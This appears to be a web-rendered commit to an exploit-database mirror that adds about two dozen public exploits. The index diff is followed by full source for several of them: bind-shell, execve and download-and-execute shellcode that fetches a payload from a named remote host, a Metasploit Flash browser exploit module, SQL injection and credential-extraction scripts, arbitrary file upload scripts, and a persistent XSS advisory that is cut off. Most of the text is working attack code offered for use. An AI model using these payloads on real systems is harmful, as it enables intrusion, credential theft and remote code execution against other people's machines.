bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-06-25

Browse source 
22 new exploits
This commit is contained in:
Offensive Security 2015-06-25 05:03:16 +00:00
parent 15dae7c288
commit 611a35761a
23 changed files with 1491 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

24
files.csv
View file

@ -33375,7 +33375,7 @@ id,file,description,date,author,platform,type,port
36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
37186,platforms/php/webapps/37186.txt,"vfront-0.99.2 CSRF & Persistent XSS",2015-06-03,"John Page",php,webapps,0
37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 CSRF & Persistent XSS",2015-06-03,"John Page",php,webapps,0
36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0
37006,platforms/java/webapps/37006.txt,"Minify 2.1.x 'g' Parameter Cross Site Scripting Vulnerability",2012-03-21,"Ayoub Aboukir",java,webapps,0
36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,"Wad Deek",php,webapps,0
@ -33612,6 +33612,10 @@ id,file,description,date,author,platform,type,port
37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
37350,platforms/php/webapps/37350.txt,"AdaptCMS 2.0.2 TinyURL Plugin index.php id Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0
37351,platforms/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin admin.php Multiple Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0
37352,platforms/php/webapps/37352.txt,"Ignite Solutions CMS 'car-details.php' SQL Injection Vulnerability",2012-06-03,Am!r,php,webapps,0
37353,platforms/php/webapps/37353.php,"Nmedia WordPress Member Conversation Plugin 1.35.0 'doupload.php' Arbitrary File Upload Vulnerability",2015-06-05,"Sammy FORGIT",php,webapps,0
37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - (Time Based) SQLi",2015-06-09,Pancaker,php,webapps,0
37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0
37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
@ -33670,6 +33674,7 @@ id,file,description,date,author,platform,type,port
37285,platforms/lin_x86/shellcode/37285.txt,"Linux/x86 - chmod() 777 /etc/shadow & exit() (33 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0
37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
37287,platforms/windows/dos/37287.html,"Cisco AnyConnect Secure Mobility 2.x_ 3.x_ 4.x - Client DoS PoC",2015-06-15,LiquidWorm,windows,dos,0
37354,platforms/php/webapps/37354.py,"Bigware Shop 2.1x 'main_bigware_54.php' SQL Injection Vulnerability",2012-06-05,rwenzel,php,webapps,0
37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - execve /bin/sh shellcode (21 bytes) (2)",2015-06-15,B3mB4m,lin_x86,shellcode,0
37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection Vulnerability",2015-06-15,"walid naceri",php,webapps,0
37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
@ -33691,13 +33696,30 @@ id,file,description,date,author,platform,type,port
37326,platforms/windows/dos/37326.py,"WinylPlayer 3.0.3 Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0
37327,platforms/windows/dos/37327.py,"HansoPlayer 3.4.0 Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0
37328,platforms/php/webapps/37328.php,"Small-Cms 'hostname' Parameter Remote PHP Code Injection Vulnerability",2012-05-26,L3b-r1'z,php,webapps,0
37358,platforms/lin_x86/shellcode/37358.c,"Linux/x86 - mkdir HACK & chmod 777 and exit(0) - 29 Bytes",2015-06-24,B3mB4m,lin_x86,shellcode,0
37359,platforms/lin_x86/shellcode/37359.c,"Linux/x86 - Netcat BindShell Port 5555 - 60 bytes",2015-06-24,B3mB4m,lin_x86,shellcode,0
37355,platforms/php/webapps/37355.txt,"MyBB 1.6.8 'member.php' SQL Injection Vulnerability",2012-06-06,MR.XpR,php,webapps,0
37356,platforms/php/webapps/37356.txt,"WordPress Email Newsletter Plugin 8.0 'option' Parameter Information Disclosure Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0
37357,platforms/php/webapps/37357.php,"WordPress VideoWhisper Video Presentation Plugin 3.17 'vw_upload.php' Arbitrary File Upload Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0
37337,platforms/php/webapps/37337.txt,"WHMCompleteSolution (WHMCS) 5.0 Multiple Application Function CSRF",2012-05-31,"Shadman Tanjim",php,webapps,0
37338,platforms/php/webapps/37338.txt,"WHMCompleteSolution (WHMCS) 5.0 knowledgebase.php search Parameter XSS",2012-05-31,"Shadman Tanjim",php,webapps,0
37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 'nsextt' Parameter Cross Site Scripting Vulnerability",2012-06-01,Aboud-el,php,webapps,0
37340,platforms/php/webapps/37340.html,"TinyCMS 1.3 File Upload CSRF",2012-06-03,KedAns-Dz,php,webapps,0
37341,platforms/php/webapps/37341.txt,"TinyCMS 1.3 index.php page Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0
37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0
37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash PoC",2015-06-23,HexTitan,windows,dos,0
37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0
37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - XSS Vulnerabilities",2015-06-24,"John Page",php,webapps,80
37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0
37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 Gif Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 PNG Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37349,platforms/windows/dos/37349.txt,"Photoshop CC2014 and Bridge CC 2014 PDF Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37361,platforms/php/webapps/37361.txt,"WordPress Huge-IT Slider 2.7.5 - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0
37362,platforms/lin_x86-64/shellcode/37362.c,"linux/x86-64 execve(/bin/sh) 30 bytes",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0
37363,platforms/php/webapps/37363.txt,"GeniXCMS 0.0.3 - register.php SQL Injection Vulnerabilities",2015-06-24,cfreer,php,webapps,80
37364,platforms/php/webapps/37364.txt,"Joomla SimpleImageUpload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80
37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 Downloand & Execute",2015-06-24,B3mB4m,lin_x86,shellcode,0
37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 Reboot - 28 Bytes",2015-06-24,B3mB4m,lin_x86,shellcode,0
37367,platforms/windows/local/37367.rb,"Windows ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,metasploit,multiple,remote,0
37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0

Can't render this file because it is too large.

33
platforms/lin_x86-64/shellcode/37362.c Executable file
View file

@ -0,0 +1,33 @@
/*
William Borskey 2015
Compile with: gcc -fno-stack-protector -z execstack Shellcode written in 64 bit Intel assembly using yasm.
1 ; int execve(const char *filename, char *const argv[], char *const envp[]);
2 BITS 64
3
4 section .text
5 global start
6
7 start:
8 mov rcx, 0x1168732f6e69622f ;move the immediate value /bin/sh in hex in
9 ;little endian byte order into rcx padded with 11
10 shl rcx, 0x08 ;left shift to trim off the two bytes of padding
11 shr rcx, 0x08 ;ringht shift to re order string
12 push rcx ;push the immediate value stored in rcx onto the stack
13 lea rdi, [rsp] ;load the address of the string that is on the stack into rsi
14 xor rdx, rdx ;zero out rdx for an execve argument
15 mov al, 0x3b ;move 0x3b (execve sycall) into al to avoid nulls
16 syscall ;make the syscall
*/
char shellcode[] = "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) shellcode;
(int)(*func)();
return 0;
}

42
platforms/lin_x86/shellcode/37358.c Executable file
View file

@ -0,0 +1,42 @@
#Greetz : Bomberman(Leader)
#Author : B3mB4m
#Auxiliary tools (50% time gain !)
#https://github.com/b3mb4m/Shellcode/blob/master/Auxiliary/convertstack.py
#https://github.com/b3mb4m/Shellcode/blob/master/Auxiliary/ASMtoShellcode.py
Disassembly of section .text:
08048060 <.text>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 48 41 43 4b push $0x4b434148 #You can change it !
8048068: b0 27 mov $0x27,%al
804806a: 89 e3 mov %esp,%ebx
804806c: 66 41 inc %cx
804806e: cd 80 int $0x80
8048070: b0 0f mov $0xf,%al
8048072: 66 b9 ff 01 mov $0x1ff,%cx
8048076: cd 80 int $0x80
8048078: 31 c0 xor %eax,%eax
804807a: 40 inc %eax
804807b: cd 80 int $0x80
#include <stdio.h>
#include <string.h>
char *shellcode =
"\x31\xc0\x50\x68\x48\x41\x43\x4b\xb0\x27\x89\xe3\x66\x41\xcd\x80\xb0\x0f\x66\xb9\xff\x01\xcd\x80\x31\xc0\x40\xcd\x80";
//First push always start with byte 68.Also mov b0.
//Than just push your string between byte 68 - b0 ! :)
//Here it is -> \x68 "\x48\x41\x43\x4b\" xb0 GOODLUCK !
int main(void){
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();}

54
platforms/lin_x86/shellcode/37359.c Executable file
View file

@ -0,0 +1,54 @@
#Greetz : Bomberman(Leader)
#Author : B3mB4m
#Concat : Do not disturb - Bomberman
#Netcat openbsd version (which is default installed in ubuntu) have
not "-e" option.
#So if you are trying to test on ubuntu(like me) you must change
version to traditional.
#Typing this:
#1) sudo update-alternatives --config nc
#2) Select the option /bin/nc.traditional
Disassembly of section .text:
08048060 <.text>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 6e 2f 6e 63 push $0x636e2f6e
8048068: 68 2f 2f 62 69 push $0x69622f2f
804806d: 89 e3 mov %esp,%ebx
804806f: 50 push %eax
8048070: 68 35 35 35 35 push $0x35353535 #PORT
8048075: 68 2d 6c 74 70 push $0x70746c2d
804807a: 89 e1 mov %esp,%ecx
804807c: 50 push %eax
804807d: 68 2f 2f 73 68 push $0x68732f2f
8048082: 68 2f 62 69 6e push $0x6e69622f
8048087: 68 2d 65 2f 2f push $0x2f2f652d
804808c: 89 e2 mov %esp,%edx
804808e: 50 push %eax
804808f: 52 push %edx
8048090: 51 push %ecx
8048091: 53 push %ebx
8048092: 89 e7 mov %esp,%edi
8048094: b0 0b mov $0xb,%al
8048096: 89 f9 mov %edi,%ecx
8048098: 31 d2 xor %edx,%edx
804809a: cd 80 int $0x80
#include <stdio.h>
#include <string.h>
char *loveme = "\x31\xc0\x50\x68\x6e\x2f\x6e\x63\x68\x2f\x2f\x62\x69\x89\xe3\x50\x68\x35\x35\x35"
"\x35\x68\x2d\x6c\x74\x70\x89\xe1\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68"
"\x2d\x65\x2f\x2f\x89\xe2\x50\x52\x51\x53\x89\xe7\xb0\x0b\x89\xf9\x31\xd2\xcd\x80";
// "\x68-----\x35\x35\x35\x35\-------x68\" There port change however you like.
int main(void){
fprintf(stdout,"Length: %d\n",strlen(loveme));
(*(void(*)()) loveme)();}

129
platforms/lin_x86/shellcode/37365.c Executable file
View file

@ -0,0 +1,129 @@
Linux/x86 Downloand&Execute
------WE ARE BOMBERMANS----
#Greetz : Bomberman(Leader)
#Author : B3mB4m
#Just the two of us LOL.
Info!
This shellcode has two part.Because when using fork in asm, ocurrs problems in shellcode.
So you can use multiprocessing to do this.
If you dont want problem while running shellcodes.
I did not calculate len bytes.Because its completely depend url length.
TESTED ON : Ubuntu 14.04
/*
The NX Bit prevents random data being executed on modern processors and OSs.
To get around it, call mprotect.
You should also define your shellcode as a binary instead of a character string.
-By Philipp Hagemeister
Emmy goes to Philipp Hagemeister ! ! (clap clap clap clap)
Special thanks :) ..
*/
;https://github.com/b3mb4m/Shellcode/blob/master/Auxiliary/convertstack.py
;Use it convert string to stack.
#Remote file download#
08048060 <.text>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 68 65 6c 6c push $0x6c6c6568
8048068: 68 62 34 6d 2f push $0x2f6d3462
804806d: 68 2f 62 33 6d push $0x6d33622f
8048072: 68 6d 2f 2f 2f push $0x2f2f2f6d
8048077: 68 73 2e 63 6f push $0x6f632e73
804807c: 68 78 69 6d 61 push $0x616d6978
8048081: 68 33 2e 6d 65 push $0x656d2e33 ;3.meximas.com/b3mb4m/hell
8048086: 89 e1 mov %esp,%ecx
8048088: 50 push %eax
8048089: 68 77 67 65 74 push $0x74656777
804808e: 68 62 69 6e 2f push $0x2f6e6962
8048093: 68 75 73 72 2f push $0x2f727375
8048098: 68 2f 2f 2f 2f push $0x2f2f2f2f
804809d: 89 e3 mov %esp,%ebx
804809f: 50 push %eax
80480a0: 50 push %eax
80480a1: 51 push %ecx
80480a2: 53 push %ebx
80480a3: 89 e1 mov %esp,%ecx
80480a5: b0 0b mov $0xb,%al
80480a7: cd 80 int $0x80
80480a9: 31 c0 xor %eax,%eax
80480ab: fe c0 inc %al
80480ad: cd 80 int $0x80
#Download&Chmod777&Execute
08048060 <.text>:
8048060: 31 c0 xor %eax,%eax
8048062: 31 c9 xor %ecx,%ecx
8048064: 50 push %eax
8048065: 68 68 65 6c 6c push $0x6c6c6568 ;file name(hell)
804806a: b0 0f mov $0xf,%al
804806c: 89 e3 mov %esp,%ebx
804806e: 66 b9 ff 01 mov $0x1ff,%cx
8048072: cd 80 int $0x80
8048074: 31 c0 xor %eax,%eax
8048076: 50 push %eax
8048077: 89 e2 mov %esp,%edx
8048079: 53 push %ebx
804807a: 89 e1 mov %esp,%ecx
804807c: b0 0b mov $0xb,%al
804807e: cd 80 int $0x80
Than lets back python.
#!/usr/bin/python
import ctypes
import multiprocessing
import time
def download(firstone="Capture"):
if firstone != "Capture":
#Download codes.
shellcode_data = (b"\x31\xc0\x50\x68\x68\x65\x6c\x6c\x68\x62\x34\x6d\x2f\x68\x2f\x62"
b"\x33\x6d\x68\x6d\x2f\x2f\x2f\x68\x73\x2e\x63\x6f\x68\x78\x69\x6d\x61\x68\x33\x2e"
b"\x6d\x65\x89\xe1\x50\x68\x77\x67\x65\x74\x68\x62\x69\x6e\x2f\x68\x75\x73\x72\x2f"
b"\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x50\x51\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xfe"
b"\xc0\xcd\x80")
else:
time.sleep(30)#Time delay, depend ur file size.
shellcode_data = (b"\x31\xc0\x50\x68\x68\x65\x6c\x6c\xb0\x0f\x89\xe3\x66\xb9\xff\x01"
b"\xcd\x80\x31\xc0\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
#Chomd777 and execute it.
shellcode = ctypes.c_char_p(shellcode_data)
function = ctypes.cast(shellcode, ctypes.CFUNCTYPE(None))
addr = ctypes.cast(function, ctypes.c_void_p).value
libc = ctypes.CDLL('libc.so.6')
pagesize = libc.getpagesize()
addr_page = (addr // pagesize) * pagesize
for page_start in range(addr_page, addr + len(shellcode_data), pagesize):
assert libc.mprotect(page_start, pagesize, 0x7) == 0
function()
for x in xrange(0, 2):
if x == 0:
first = multiprocessing.Process(target=download, args=("KnockKnock",))
else:
first = multiprocessing.Process(target=download)
first.start()
#Bomberman Team presented !!

34
platforms/lin_x86/shellcode/37366.c Executable file
View file

@ -0,0 +1,34 @@
Linux/x86 Reboot - 28Bytes
#Greetz : Bomberman(Leader)
#Author : B3mB4m
#Tested ON : Ubuntu 14.04
08048060 <.text>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 62 6f 6f 74 push $0x746f6f62
8048068: 68 6e 2f 72 65 push $0x65722f6e
804806d: 68 2f 73 62 69 push $0x6962732f
8048072: 89 e3 mov %esp,%ebx
8048074: 50 push %eax
8048075: 53 push %ebx
8048076: 89 e1 mov %esp,%ecx
8048078: b0 0b mov $0xb,%al
804807a: cd 80 int $0x80
#include <stdio.h>
#include <string.h>
char *shellcode = "\x31\xc0\x50\x68\x62\x6f\x6f\x74\x68\x6e\x2f\x72\x65"
"\x68\x2f\x73\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
int main(void){
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}

150
platforms/multiple/remote/37368.rb Executable file
View file

@ -0,0 +1,150 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player ShaderJob Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability related to the ShaderJob workings on
Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the
same Bitmap object as src and destination of the ShaderJob. Modifying the "width" attribute
of the ShaderJob after starting the job it's possible to create a buffer overflow condition
where the size of the destination buffer and the length of the copy are controlled. This
module has been tested successfully on:
* Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169.
* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169.
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169.
* Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Evans', # Vulnerability discovery
'Unknown', # Exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-3090'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'],
['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'],
['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'],
['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'May 12 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end

9
platforms/php/webapps/37350.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53764/info
AdaptCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AdaptCMS 2.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?view=plugins&plugin=tinyurl&module=go&id='1337 AND 2=1 UNION SELECT 1,2,3,4,5--

9
platforms/php/webapps/37351.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53764/info
AdaptCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AdaptCMS 2.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/admin.php?view=plugins&do=load&plugin=tinyurl&module=delete&id=[ + SQL Injection Code + ]

7
platforms/php/webapps/37352.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/53771/info
Ignite Solutions CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/car-details.php?ID=[Sql]

31
platforms/php/webapps/37353.php Executable file
View file

@ -0,0 +1,31 @@
source: http://www.securityfocus.com/bid/53790/info
The Nmedia WordPress Member Conversation plug-in for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Nmedia WordPress Member Conversation 1.35.0 is vulnerable; other versions may also be affected.
<?php
$uploadfile="lo.php";
$ch =
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/wordpress-member-private-conversation/doupload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>"/test/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://www.exemple.com/wordpress/wp-content/uploads/user_uploads/test/lo.php
lo.php
<?php
phpinfo();
?>

31
platforms/php/webapps/37354.py Executable file
View file

@ -0,0 +1,31 @@
source: http://www.securityfocus.com/bid/53810/info
Bigware Shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Bigware Shop versions prior to 2.17 are vulnerable.
#!/usr/bin/python
# -*- coding: utf-8 -*-
import httplib2
import urllib
import sys
# insert your target link here (with trailing slash)
url = "http://www.example.com/"
h = httplib2.Http()
# send sql injection
headerdata = {'Content-type': 'application/x-www-form-urlencoded'}
sqli = '2 AND (SELECT 1 FROM(SELECT COUNT(*), CONCAT((SELECT former_email_address FROM former where former_groups_id like 1 LIMIT 0,1), CHAR(58), (SELECT
former_password FROM former where former_groups_id like 1 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)'
postdata = { 'voteid' : '2', \
'pollid' : sqli, \
'x' : '1', \
'y' : '1', \
'forwarder' : 'http%3a%2f%2fdemoshop.bigware.org%2fmain_bigware_53.php%3fop%3dresults%26pollid%3d2'}
response, content = h.request(url + "main_bigware_54.php", "POST", headers=headerdata, body=urllib.urlencode(postdata))
print content, "\n", "\n"
print "If there is an error stating the duplicate admin entry, your shop is vulnerable."

9
platforms/php/webapps/37355.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53814/info
MyBB is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
MyBB 1.6.8 is vulnerable; other versions may also be affected.
http://www.example.com/forums/member.php?action=profile&uid=[Sqli]

15
platforms/php/webapps/37356.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/53850/info
The Email Newsletter plugin for WordPress is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.
An attackers can exploit this issue to obtain sensitive information that may aid in further attacks.
Email Newsletter 8.0 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=registered_user
http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=view_suscriber
http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=commentposed _user
http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=contact_user

23
platforms/php/webapps/37357.php Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/53851/info
The VideoWhisper Video Presentation plug-in for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
VideoWhisper Video Presentation 3.17 is vulnerable; other versions may also be affected.
<?php
$uploadfile="lo.php.gif";
$ch =
curl_init("http://www.example.com/wordpress/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'room'=>'./'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

95
platforms/php/webapps/37360.txt Executable file
View file

@ -0,0 +1,95 @@
# Exploit Title: Persistent XSS
# Google Dork: intitle: Persistent XSS
# Date: 2015-06-21
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: genixcms.org
# Software Link: genixcms.org
# Version: 0.0.3
# Tested on: windows 7
# Category: webapps
Vendor:
=============================================
genixcms.org
Product:
=====================================================
GeniXCMS v0.0.3 is a PHP based content management system
Advisory Information:
===================================================
Multiple persistent & reflected XSS vulnerabilities
Vulnerability Details:
=========================================================
GeniXCMS v0.0.3 is vulnerable to persistent and reflected XSS
XSS Exploit code(s):
====================
Persistent XSS:
-----------------------
http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&act=add&token=
1-content input field
content injected XSS will execute after posting is published
2-title input field
title injected XSS will execute immediate.
Relected XSS:
---------------------
